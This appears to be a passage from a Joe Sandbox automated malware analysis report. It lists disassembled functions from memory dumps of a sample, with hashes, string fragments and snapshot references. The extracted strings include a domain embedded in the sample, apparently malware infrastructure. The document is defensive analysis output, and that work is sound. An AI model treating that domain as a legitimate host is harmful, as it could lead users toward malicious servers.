                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00409170
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: M/($M/(
                                                                                                                                                                                                                                                                • API String ID: 237503144-1710806632
                                                                                                                                                                                                                                                                • Opcode ID: 5ccba946f08c7c65f5960b6106ec9ed293f805d4b7c7694f326ce00f44be5bf9
                                                                                                                                                                                                                                                                • Instruction ID: 5780e10d47c6d73161d66cfac6a928ec1cc399456c86052081acc469c54c8a26
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ccba946f08c7c65f5960b6106ec9ed293f805d4b7c7694f326ce00f44be5bf9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1221237165C3515FE714CE34988179FBBAAEBC6700F01892CE4D1EB2C5D679880BC756
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: .txt$<\hX$_^]\
                                                                                                                                                                                                                                                                • API String ID: 0-3117400391
                                                                                                                                                                                                                                                                • Opcode ID: bdd2cb9d5e07635f75fd939429c093274597243337950132fed5976687001e54
                                                                                                                                                                                                                                                                • Instruction ID: b54e5a9055dcea9f4e2ef5537ef2de55add5ada1cc68386b69f960872f4b9820
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdd2cb9d5e07635f75fd939429c093274597243337950132fed5976687001e54
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ECC12E7060C380DFD7149F29E84162BBBE2AF85310F488ABDF495472E2D73999568B17
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: D7!g$I/`[
                                                                                                                                                                                                                                                                • API String ID: 0-3997986174
                                                                                                                                                                                                                                                                • Opcode ID: 14af1053e74841fa53dc76244a9bbcb909bb1837a57339724d074cdbe832e135
                                                                                                                                                                                                                                                                • Instruction ID: 0ca3eb27db681a8d7206fc6222346564d49badd1bced95644cc7129a0dfd7e60
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14af1053e74841fa53dc76244a9bbcb909bb1837a57339724d074cdbe832e135
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7B2D5F360C6009FE704AE2DEC8567AFBE9EF94720F16893DE6C483744EA3558058697
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Fm$V]$lev-tolstoi.com
                                                                                                                                                                                                                                                                • API String ID: 0-1622397547
                                                                                                                                                                                                                                                                • Opcode ID: 1e3846b2498f430f937bee816dc3a1db8597f4ee72130f76522c6c746b4ccea1
                                                                                                                                                                                                                                                                • Instruction ID: 6bc032c5493e5d71536b5b3465467cda8d97e07f261e4db83ade1fa6b842392f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e3846b2498f430f937bee816dc3a1db8597f4ee72130f76522c6c746b4ccea1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A391D5B62557908FD326CF2AC480656BFA2EFD631876E869CC0954F756C33AE807CB50
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: [V$bh
                                                                                                                                                                                                                                                                • API String ID: 0-2174178241
                                                                                                                                                                                                                                                                • Opcode ID: 4490c21e4526e7ab47664312bece51eb8373e77724cdb752fbe4dcdb45a8e35b
                                                                                                                                                                                                                                                                • Instruction ID: 507dc818ae109bf416ba88655e90edc5520927858d8d977b2f8616241f98694c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4490c21e4526e7ab47664312bece51eb8373e77724cdb752fbe4dcdb45a8e35b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A03268B1901716CBCB25CF28C8916B7B7B2FF95310F19825DD9969F394E738A842CB90
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ]ioG$lJv}
                                                                                                                                                                                                                                                                • API String ID: 0-2860389727
                                                                                                                                                                                                                                                                • Opcode ID: ae6840ce025de0326b0315fa72f85820250028c86c7b3d8176fe93981fe84b4d
                                                                                                                                                                                                                                                                • Instruction ID: 785503258df957e68bf308ac56e4f942a29aaed461be4d90a8cda732420b2a03
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae6840ce025de0326b0315fa72f85820250028c86c7b3d8176fe93981fe84b4d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9232B2F350C200AFE3046F29EC8567AFBE9EF94720F1A492DEAC493740E63558558B97
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: /Cul$V_
                                                                                                                                                                                                                                                                • API String ID: 0-3372171723
                                                                                                                                                                                                                                                                • Opcode ID: 5afec70fcd3fc204da278c0e8f21fa3a2689d0a23d8355dd2f9b83860226cb69
                                                                                                                                                                                                                                                                • Instruction ID: 10ab63106a5ba543df12c9133ee7cb68713d6dd359d791fbcd9c8c972a318f41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5afec70fcd3fc204da278c0e8f21fa3a2689d0a23d8355dd2f9b83860226cb69
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F202F1F3E146248BF3445E38DC59366B692DB94320F2F823C9E989B7C4E97E9D094385
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~$!k
                                                                                                                                                                                                                                                                • API String ID: 0-3376054287
                                                                                                                                                                                                                                                                • Opcode ID: 80b0b32f718cd60834cc263462e1141d60b8431a5a0488f70a27a385f4bc8dec
                                                                                                                                                                                                                                                                • Instruction ID: a0c4b7a7854b031ad5fa5f554d50e38e2812a4367930355ff5e671042cdb364f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80b0b32f718cd60834cc263462e1141d60b8431a5a0488f70a27a385f4bc8dec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DD1D3F3E106204BF3444D29DC99366B692EBD4320F2F823D9A899B7C5ED7E5C0A4385
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: )$IEND
                                                                                                                                                                                                                                                                • API String ID: 0-707183367
                                                                                                                                                                                                                                                                • Opcode ID: 1d2db428f7f5102f82a8f5256b32263e909813f51436040fa5fda616a19ed86d
                                                                                                                                                                                                                                                                • Instruction ID: ae7051e8a1896b643dfe6de32fa464a75629580fa55e5a424d119cff04bb15e9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d2db428f7f5102f82a8f5256b32263e909813f51436040fa5fda616a19ed86d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAD1DEB5908394DFD721CF15D841B9BBBE4AB98304F144A2DF9999B3C2D375E908CB82
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: u=o
                                                                                                                                                                                                                                                                • API String ID: 0-3464535994
                                                                                                                                                                                                                                                                • Opcode ID: 98f74d8b78a80cfdd8369453c23a695962129b93ec5bb691dc42415ff658dde2
                                                                                                                                                                                                                                                                • Instruction ID: 1e5f8423e398215886224e35b198d57ae0c53af7f084fcb3e4c1c0fae5aa157d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98f74d8b78a80cfdd8369453c23a695962129b93ec5bb691dc42415ff658dde2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F1E1B3F116244BF3545979DC98366B683DBD4320F2F823C9E99A77C5D87E5C0A4284
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: Y`=}
                                                                                                                                                                                                                                                                • API String ID: 0-2613711147
                                                                                                                                                                                                                                                                • Opcode ID: a6b8234e5c1d341d021b2bbc1fe8004b180bf454746a21a13ac7485591d67bf2
                                                                                                                                                                                                                                                                • Instruction ID: aa9cbc69c8d9aa9f155258c600a1380149d76731b83ec68356fdffa2d3019cef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6b8234e5c1d341d021b2bbc1fe8004b180bf454746a21a13ac7485591d67bf2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F1C0F3F146118BF3445E29DC94366B692EBD4320F2F863C9A989B7C4D97E9C068385
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                • API String ID: 0-2657877971
                                                                                                                                                                                                                                                                • Opcode ID: 69e9ed893c34dcf5c979d38e7cdc1399d306fb111d956db24cd5179001915539
                                                                                                                                                                                                                                                                • Instruction ID: 8ee52a0694c897f0a008ece45df6797da8e67bc14caaedb7cf9717195d3f9390
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69e9ed893c34dcf5c979d38e7cdc1399d306fb111d956db24cd5179001915539
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15D188B3F2252547F3544839CC683A266839BE4321F2F82788E5D6B7C5ED7E5D0A5384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                                • Opcode ID: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                                                                                                                                                                                                                                • Instruction ID: c7148fe4508fe2ed95867d796b332cee85c6ab2f8d10e8da205195218ab03dbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a481a20cd818ae86bd77ddd76c28e78242e6649cf267746c47876947a36422a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90C138B2A083056BD7258E25C89076BB7D5EF84314F18897EE8959B3C2E738DC4487DA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ~/K]
                                                                                                                                                                                                                                                                • API String ID: 0-2682434281
                                                                                                                                                                                                                                                                • Opcode ID: 8d5d5c139c39f4649e648d7af2f1436cf5a453c6d40786a939fe19441b476837
                                                                                                                                                                                                                                                                • Instruction ID: 385004873e7e15aea7b7cc09d9d05327a28b30541cb23497dd319928a6b2884c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d5d5c139c39f4649e648d7af2f1436cf5a453c6d40786a939fe19441b476837
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07C199B7F1162547F3944838CC983A265829B95321F2F82788EACBBBC5DC7E5D0A53C4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: S+
                                                                                                                                                                                                                                                                • API String ID: 0-4116795713
                                                                                                                                                                                                                                                                • Opcode ID: fdf6052b8861883151cce004e0c6cd34e888f4c48f3d35fff5657d0ac31b91a3
                                                                                                                                                                                                                                                                • Instruction ID: 5016873c7c4d4059af55009ae4a870e5ad77ae046907b3d1290d1d3e78d06b9f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdf6052b8861883151cce004e0c6cd34e888f4c48f3d35fff5657d0ac31b91a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAB19BB3F106258BF3544D78CD993A26682DB94320F2F82388F99AB7C5D97E9C095384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: F,|
                                                                                                                                                                                                                                                                • API String ID: 0-710049258
                                                                                                                                                                                                                                                                • Opcode ID: 39ac8f5f6fc54d7d61e55121f71e10f47e0fa04a06d1d1b9fa8ce9a3de128f23
                                                                                                                                                                                                                                                                • Instruction ID: 727d8337ec129982cb1cc8402404ed5e18a88d50f18dbecd6f6b7c7b24f557a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39ac8f5f6fc54d7d61e55121f71e10f47e0fa04a06d1d1b9fa8ce9a3de128f23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 99B18DB3F112358BF3604D69DC983A272929BA5321F2F82788E5C6B7C5E97E5C0953C4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                                • API String ID: 0-498629140
                                                                                                                                                                                                                                                                • Opcode ID: 1a2a254be4b8be410c1a6ee14a77ea163c9e72763a6a75db3bd7cb0ad92aa8b5
                                                                                                                                                                                                                                                                • Instruction ID: d83ee2a76e08ff514781e8ef09dae9c2e34df3ca3e736b13c6c699f48e71ffbf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a2a254be4b8be410c1a6ee14a77ea163c9e72763a6a75db3bd7cb0ad92aa8b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7919DB3F116254BF3448D39CC583A27683EBD5311F2F81788A499B7C9D97EAD0A5384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: w
                                                                                                                                                                                                                                                                • API String ID: 0-476252946
                                                                                                                                                                                                                                                                • Opcode ID: e1a260034a87f1d203356d90d857da4bc5dacd9bed180c4d1d45b5b51add82a4
                                                                                                                                                                                                                                                                • Instruction ID: 35596293c9528a5d200d4254faf5270a4340b51c767cfecfaf9ae8a605172f1f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1a260034a87f1d203356d90d857da4bc5dacd9bed180c4d1d45b5b51add82a4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 659198B3F115348BF3544939DC583A26682DBD4320F2F82788E9CAB7C9D87E5D0A9384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: jw3
                                                                                                                                                                                                                                                                • API String ID: 0-3843055673
                                                                                                                                                                                                                                                                • Opcode ID: 11b4dd360b08e30d06158a676053d080999c590a164edf544ac2f2f49ec743d2
                                                                                                                                                                                                                                                                • Instruction ID: a7101223935ec8155839e968eb9642d70da241742a82cf89ff0488599d878b5f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11b4dd360b08e30d06158a676053d080999c590a164edf544ac2f2f49ec743d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28919CB3F116298BF3444928DC983A27643DBE5325F2F41388B0D6B7C6D97E9D0A9384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: %^
                                                                                                                                                                                                                                                                • API String ID: 0-159914195
                                                                                                                                                                                                                                                                • Opcode ID: 3b72bd6e1494dafefc4b6df273478c219291c2f5a12e909056943d00bd36e02e
                                                                                                                                                                                                                                                                • Instruction ID: d0fd681550703637913678f7d2d131c21ff7e5733814b2ca825d514871c8d101
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b72bd6e1494dafefc4b6df273478c219291c2f5a12e909056943d00bd36e02e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F919FB3F1152587F3484939CC683666683DBD5324F2F82788F196B7C5ED7E5C0A5288
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: r
                                                                                                                                                                                                                                                                • API String ID: 0-1812594589
                                                                                                                                                                                                                                                                • Opcode ID: 299dcae9adb725bdedbb246565fc5a0c4fea753af6f9fc240cd6ce6deee5b56e
                                                                                                                                                                                                                                                                • Instruction ID: 1a488b2411a1386b478e1ce8582c31c78d764f2234382a358afa8441d896c21d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 299dcae9adb725bdedbb246565fc5a0c4fea753af6f9fc240cd6ce6deee5b56e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92816BF3F2063543F3544879CD683A26582D795324F2F82788E5DABBC6D87E9D0A12C8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: h
                                                                                                                                                                                                                                                                • API String ID: 0-2439710439
                                                                                                                                                                                                                                                                • Opcode ID: a690bb36ffba88905005624f085a3b300e6da536a6c60b561b8787f463150456
                                                                                                                                                                                                                                                                • Instruction ID: 6796dcc9647e05085cdebc4d352321fa8f0eaa550ddbea81a52a1385e59baf09
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a690bb36ffba88905005624f085a3b300e6da536a6c60b561b8787f463150456
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91915AB3F116258BF3544978CD583A27693DBD1310F2F82788E486BBC9D97E9C0A6384
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: gf_h
                                                                                                                                                                                                                                                                • API String ID: 0-3047493573
                                                                                                                                                                                                                                                                • Opcode ID: 544dbeea703999128f8f838543b2b501cf9833ad64ca5e5ac7d99ebef28a687d
                                                                                                                                                                                                                                                                • Instruction ID: 9acb956e495ef0c20a1af286a8affbe441462cad06069bca4151acfb9f6f3add
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 544dbeea703999128f8f838543b2b501cf9833ad64ca5e5ac7d99ebef28a687d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C816CB3E1022587F3544E29DC983A27692EB95321F2F417C8E89AB3C1D97F6D4993C4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: as@q
                                                                                                                                                                                                                                                                • API String ID: 0-588421084
                                                                                                                                                                                                                                                                • Opcode ID: d55707e88666fe2564c9083a51723d5b7b976e31c7c8bbce53f3a4b07f291e5c
                                                                                                                                                                                                                                                                • Instruction ID: 3f0812a176267428d605bcff9eec77634abd5a5c3f8fdf58a98d6f471e3b3ba8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d55707e88666fe2564c9083a51723d5b7b976e31c7c8bbce53f3a4b07f291e5c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB818CB7F116254BF3544929CC983A67283EBE5311F3F82788A195B7C5DD3EAC0A9384
